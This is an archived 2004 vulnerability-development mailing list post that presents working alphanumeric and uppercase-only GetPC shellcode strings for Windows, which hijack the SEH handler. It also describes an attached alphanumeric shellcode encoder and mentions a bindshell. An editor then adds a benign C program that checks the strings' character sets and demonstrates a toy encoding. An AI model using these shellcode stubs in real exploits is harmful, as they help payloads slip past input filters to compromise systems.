Vulnerability Development mailing list archives
Alphanumeric GetPC code. (was: GetPC code (was: Shellcode from ASCII))
From: "Berend-Jan Wever" <SkyLined () edup tudelft nl>
Date: Wed, 28 Jan 2004 16:58:49 +0100
Hi all,

There was a thread about writing ASCII GetPC code about half a year ago on vuln-dev. I've been away a few months; that's why I haven't written this mail earlier.

I've developed 100% alphanumeric GetPC code for Win NT/2K/XP based on work by Costin Ionescu:

"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089";

This code uses fs to get the current SEH address and overwrites it with a new SEH. Then it causes an exception, passing execution to the new SEH. This SEH can determine the location where the exception took place from the information about the exception provided by the OS. It then transfers execution back, passing the location of the code along in %ecx. Should work 100% of the time.

I've also developed 100% UPPERCASE alphanumeric GetPC code:

"VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816";

This code assumes the start of the SEH chain is at the top of the stack and that you have not used more than 65536 bytes of stack (SEH @ 0xXXXXffe4, where XXXX is taken from %esp). The resulting address SHOULD point to the last SEH in the chain, which will be overwritten and then called by causing an exception, just like the "normal" SEH GetPC. Because this code assumes you have not used more than 65535 bytes of stack or fucked up %esp, and because it hijacks the LAST SEH (if an earlier SEH handles the exception, the code will not work!), this code will not work under some conditions.

In addition to these GetPC codes, I've written an UPPERCASE alphanumeric shellcode en-/decoder; source is attached. The decoder works on any IA32/x86 system, regardless of OS/SP, unlike the GetPC code, which is Windows specific. This will allow you to write OS/SP-spanning uppercase alphanumeric shellcodes like this w32 bindshell (port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hanks: Costin Ionescu for the idea behind w32 SEH GetPC.
HD Moore for the shellcodes and concepts at www.metasploit.com

Greets: 0dd, #netric, (K)(L)(F) for Suzan

Cheers,
SkyLined

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com
Comment: Berend-Jan Wever - skylined () edup tudelft nl

mQGiBD//MyARBADnHLyg2lUBEddhdWAVBxovYU5PetLk2y3HZKguauHS6tT7sNPb
WR4JuRZ5G9uTkgS/JlVl8jhdvAfOhAsXnlSwfBljPSt7ylHkmG/0TUQV14+OVIks
joq80V2yGNT8oRGC/HMk6d20THXFsqiE8pLF5OVdcF0PpTP14OeavvWp2QCg/2Yb
nk1i1VSjOCmPudJ+7klQbI0D/3pRkXQofpYslG7hBaEndDOVFRo9rgF5D4cbmIo0
eH9LEtzHiB+Q1wgJ2CUxWQeYtqCE5upBOl5vwnlY86vH6QdxZ7JdOhyWU2bgbb+D
xZrWgE1LibVdqC6ow2NgmCTQhvnBVpuvrpfe50iohujCzzI4n8Vwolg4jQtCmsU/
2glaA/9vM9T09rlq0CMQnwI3o1WPuyaVd2RrODo8AScKmYkukiuOCF7HSB//hGOX
1HXkM+yRi7ZtGVuX2sY2wkjiZa1OUuL28I5FInJQxoS8FuMtlEY2vqVHcw01KL3O
NQPvVMNoieKM3hrLGUNTgvsiGEFZYzp908bvicGh3c1yrbo6XLQrQmVyZW5kLUph
biBXZXZlciA8c2t5bGluZWRAZWR1cC50dWRlbGZ0Lm5sPokAWAQQEQIAGAUCP/8z
IAgLCQgHAwIBCgIZAQUbAwAAAAAKCRDnF8rcdEbf3T07AKDQp2C/tLe5X8v1iUBa
TlEogOUvrQCg7SHA3QPk2f/6wnl9sqhADvXdS1W5Ag0EP/8zIBAIAPZCV7cIfwgX
cqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyD
vWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5
u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98
iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlA
GBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqr
ol7DVekyCzsAAgIIAPBwtE5Q5qtEuK/1a7rNrHvRTpgTJpw9P6B61TfGACiucXne
Xo28DbabGuD8yfiNaXTHKt9NAtfHxVTL1hFUIfK5dZ9o6FG4pJFZtXfjmGqoac6A
G2zBNWNAr26OqoEKrFohJyJ8rcIY+FKrH5axaBc9II5cxcQebWoFXU/tGq+4yVaZ
4669mfHBSfiThe4N1hlcrlcehxUe3QFZYmQHYClXpldY0t3/N71k5jd6a1NZ5j9Z
kfTBzXTtbKERt1mM9gptU4LjGJQFoNBw6dRj+IQc4wJG6nAmKaQpOwMdPnii8Kz1
i+MRkW92vt8bfcXqA38XcASI5iqKmQCSSYoBW0qJAEwEGBECAAwFAj//MyAFGwwA
AAAACgkQ5xfK3HRG391CBgCffzGf174a1bKMu4EbOFfrD9eyj90An14tyn0tPGg5
IlutbA2EL52jJYz2
=OpSl
-----END PGP PUBLIC KEY BLOCK-----
Attachment:
ALPHA_04.c
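Added example (editor's code, not from the post and not the attached ALPHA_04.c): a host-side C program that does two things a practitioner wants before relying on a charset-limited payload. It checks the two GetPC blobs quoted in the message against their stated constraints (the first is alphanumeric but mixed case, the second is uppercase only), and it shows a toy two-characters-per-byte uppercase alphanumeric encoding with its decoder, so the 2x size expansion and the "only the low nibble of each character matters" trick are concrete. The nibble-to-character mapping and the sample payload bytes are constructed for illustration and are assumptions of this example; they are not the scheme implemented by SkyLined's encoder.

```c
/*
 * Added example; not from the post and not SkyLined's ALPHA_04.c.
 * 1. Check that a blob really is alphanumeric / uppercase alphanumeric.
 * 2. A toy two-characters-per-byte uppercase alphanumeric encoding with
 *    its decoder, to make the 2x expansion and the low-nibble trick
 *    concrete. The mapping is an illustrative assumption, not the
 *    scheme used by the attached encoder.
 */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* The two GetPC blobs quoted in the post. */
static const char GETPC_MIXED[] =
    "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089";
static const char GETPC_UPPER[] =
    "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816";

/* Constructed sample payload (arbitrary bytes, not real shellcode)
 * and what alnum_encode() below turns it into. */
static const unsigned char SAMPLE_PAYLOAD[] = {0x00, 0xFF, 0x4A, 0x31, 0xC0};
static const char SAMPLE_ENCODED[] = "00OO4J31L0";

/* 1 if every byte is [A-Za-z0-9], else 0. */
int is_alnum_blob(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++) {
        unsigned char c = p[i];
        if (!((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
              (c >= '0' && c <= '9')))
            return 0;
    }
    return 1;
}

/* 1 if every byte is [A-Z0-9], else 0. */
int is_upper_alnum_blob(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++) {
        unsigned char c = p[i];
        if (!((c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')))
            return 0;
    }
    return 1;
}

/* Character in [A-Z0-9] whose LOW nibble equals nib (0..15):
 * '0'..'9' (0x30..0x39) carry 0..9, 'J'..'O' (0x4A..0x4F) carry 10..15.
 * The decoder therefore only needs the low nibble of each character. */
static char nibble_char(unsigned nib) {
    return (char)(nib < 10 ? '0' + nib : 'A' + (nib - 1));
}

/* Encode n bytes as 2n uppercase-alphanumeric characters plus NUL.
 * out must hold 2n+1 bytes; returns the number of characters (2n). */
size_t alnum_encode(const unsigned char *in, size_t n, char *out) {
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = nibble_char(in[i] >> 4);    /* high nibble first */
        out[2 * i + 1] = nibble_char(in[i] & 0x0F);  /* then low nibble  */
    }
    out[2 * n] = '\0';
    return 2 * n;
}

/* Decode: byte = (low nibble of c1) << 4 | (low nibble of c2).
 * Returns bytes written, or 0 on odd length or a character outside [A-Z0-9]. */
size_t alnum_decode(const char *in, size_t len, unsigned char *out) {
    if (len % 2) return 0;
    for (size_t i = 0; i < len; i += 2) {
        unsigned char c1 = (unsigned char)in[i], c2 = (unsigned char)in[i + 1];
        if (!is_upper_alnum_blob(&c1, 1) || !is_upper_alnum_blob(&c2, 1)) return 0;
        out[i / 2] = (unsigned char)(((c1 & 0x0F) << 4) | (c2 & 0x0F));
    }
    return len / 2;
}

/* 1 if encoding `in` yields exactly `expected`. */
int encode_matches(const unsigned char *in, size_t n, const char *expected) {
    char buf[2 * 256 + 1];
    if (n > 256) return 0;
    alnum_encode(in, n, buf);
    return strcmp(buf, expected) == 0;
}

/* 1 if encode -> charset check -> decode reproduces `in` byte for byte. */
int roundtrip_ok(const unsigned char *in, size_t n) {
    char enc[2 * 256 + 1];
    unsigned char dec[256];
    if (n > 256) return 0;
    size_t len = alnum_encode(in, n, enc);
    if (!is_upper_alnum_blob((const unsigned char *)enc, len)) return 0;
    return alnum_decode(enc, len, dec) == n && memcmp(dec, in, n) == 0;
}

int main(void) {
    char enc[sizeof SAMPLE_PAYLOAD * 2 + 1];
    alnum_encode(SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD, enc);
    printf("mixed-case GetPC: alnum=%d upper=%d\n",
           is_alnum_blob((const unsigned char *)GETPC_MIXED, strlen(GETPC_MIXED)),
           is_upper_alnum_blob((const unsigned char *)GETPC_MIXED, strlen(GETPC_MIXED)));
    printf("uppercase GetPC : alnum=%d upper=%d\n",
           is_alnum_blob((const unsigned char *)GETPC_UPPER, strlen(GETPC_UPPER)),
           is_upper_alnum_blob((const unsigned char *)GETPC_UPPER, strlen(GETPC_UPPER)));
    printf("%zu payload bytes -> %zu chars: %s (round trip %s)\n",
           sizeof SAMPLE_PAYLOAD, strlen(enc), enc,
           roundtrip_ok(SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD) ? "ok" : "FAILED");
    return 0;
}
```

The mapping is chosen so that the decode side needs nothing but the low nibble of each input character, the kind of cheap arithmetic a restricted-charset decoder stub has to get by with. A real in-payload decoder, like the one in the attachment, must additionally express that logic with instructions whose own opcode bytes are alphanumeric; this host-side program does not attempt that and only shows the encoding contract and its size cost.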